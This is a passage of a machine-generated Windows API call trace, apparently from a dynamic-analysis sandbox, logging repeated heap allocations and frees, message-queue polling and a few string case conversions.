[0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0263.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0263.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0263.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0263.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0263.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0263.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0263.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0263.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0263.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0263.123] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0263.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0263.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0263.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0263.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0263.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0263.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0263.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0263.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0263.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0263.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0263.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0263.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0263.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0263.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0263.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0263.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0263.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0263.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0263.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0263.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0263.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0263.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0263.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0263.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0263.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0263.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20b0 [0263.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0263.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0263.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0263.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0263.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0263.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0263.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.126] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0263.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0263.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0263.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0263.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0263.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0263.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0263.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0263.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0263.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0263.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0263.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0263.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0263.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0263.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0263.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0263.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0263.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0263.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0263.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0263.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0263.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0263.128] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0263.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0263.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0263.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0263.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0263.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20b0 [0263.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0263.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0263.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0263.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0263.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0263.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0263.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0263.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0263.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0263.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0263.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x34a20d0 [0263.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0263.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x34a2060 [0263.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0263.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0263.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0263.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0263.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.130] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0263.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0263.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0263.130] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0263.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0263.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0263.130] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0263.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0263.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.131] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0263.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0263.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0263.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.131] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0263.131] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0263.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0263.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0263.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0263.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0263.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) 